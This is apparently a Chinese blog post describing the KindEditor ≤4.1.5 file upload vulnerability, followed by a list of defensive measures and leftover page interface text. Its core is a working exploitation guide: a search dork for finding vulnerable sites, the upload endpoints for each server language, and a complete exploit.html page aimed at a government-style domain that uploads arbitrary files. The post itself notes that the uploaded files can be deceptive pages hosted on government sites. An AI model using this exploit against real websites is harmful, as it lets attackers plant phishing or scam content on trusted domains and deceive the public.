[渗透]kindeditor4.1.5文件上传漏洞

漏洞等级:高危

Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。

漏洞描述:

Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持
Java、.NET、PHP、ASP等程序。

漏洞利用:
  • 通过搜索引擎找到目标,比如:搜索关键字 inurl:com/kindeditor
  • 通过访问http://www.xx.com/kindeditor/kindeditor.js,查看kindeditor版本是否含有漏洞(<=4.1.5)
  • 获得网站使用的开发语言,并确定kindeditor上传文件地址,各种语言上传地址如下:
    /asp/upload_json.asp
    /asp.net/upload_json.ashx
    /jsp/upload_json.jsp
    /php/upload_json.php
  • 创建exploit.html页面,编辑内容如下:
	<html>
	<head>
	<title>kindeditor exploit</title>
	<script src="http://www.xx.gov.cn/kindeditor/kindeditor.js"></script>
	<script>
		KindEditor.ready(function(K) {
	
		var uploadbutton = K.uploadbutton({
	
		button : K('#uploadButton')[0],
	
		fieldName : 'imgFile',
	
		url : 'http://www.xx.gov.cn/kindeditor/asp.net/upload_json.ashx?dir=file',
	
		afterUpload : function(data) {
	
		if (data.error === 0) {
	
		var url = K.formatUrl(data.url, 'absolute');
	
		K('#url').val(url);}
	
		},
	
		});
	
		uploadbutton.fileBox.change(function(e) {
	
		uploadbutton.submit();
	
		});
	
		});
	
	</script>
	</head>
	<body>
	
	<div class="upload">
	
	<input type="button" id="uploadButton" value="Upload" />
	
	</div>
	
	</body>
	</html>

访问页面效果如下:
在这里插入图片描述

  • 选择文件test.txt文件(文件内容:test…2019/03/04),网站审核元素,查看返回结果,如图:
    在这里插入图片描述
  • 访问网址结果如下:
    在这里插入图片描述
漏洞影响:

由于该漏洞无法上传php,asp,java等类型文件,所以无法getshell,但是可以上传包含色情、赌博等类欺骗性html网页,如果上传到政府类网站,不法分子会利用政府域名的权威性达到欺骗普通用户的目的,所以危害性很大。

解决办法:

限制上传文件类型

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对于 KindEditor 的任意文件漏洞,可以采取以下步骤进行防护: 1. 更新到最新版本:及时更新 KindEditor 到最新版本,以确保修复了已知的漏洞。 2. 文件类型白名单:在服务器端进行文件类型白名单限制,只允许上特定的安全文件类型,并禁止上可执行文件、脚本文件等危险文件类型。 3. 文件大小限制:限制上文件的大小,控制上文件的大小范围,以防止恶意用户上过大的文件导致服务器资源耗尽。 4. 文件后缀检查:检查文件后缀是否与实际文件类型一致,避免恶意用户通过修改文件后缀绕过文件类型限制。 5. 文件内容检查:对上文件进行内容检查,使用杀毒软件或者自定义规则对上文件进行扫描,确保上文件没有包含恶意代码。 6. 临时文件处理:将上文件保存在非 Web 可访问目录下,并限制访问权限,防止用户直接访问上文件。 7. 强制下载:在返回上成功的链接时,强制浏览器将其当做下载文件处理,而不是直接在浏览器中打开。 8. 日志监控:监控系统日志,及时发现异常行为,并及时采取相应的防护措施。 请注意,以上措施只是一些基本的防护措施,具体的防护策略需要根据实际需求和系统环境来确定。同时,建议定期对系统进行安全审计和漏洞扫描,及时修补已知漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值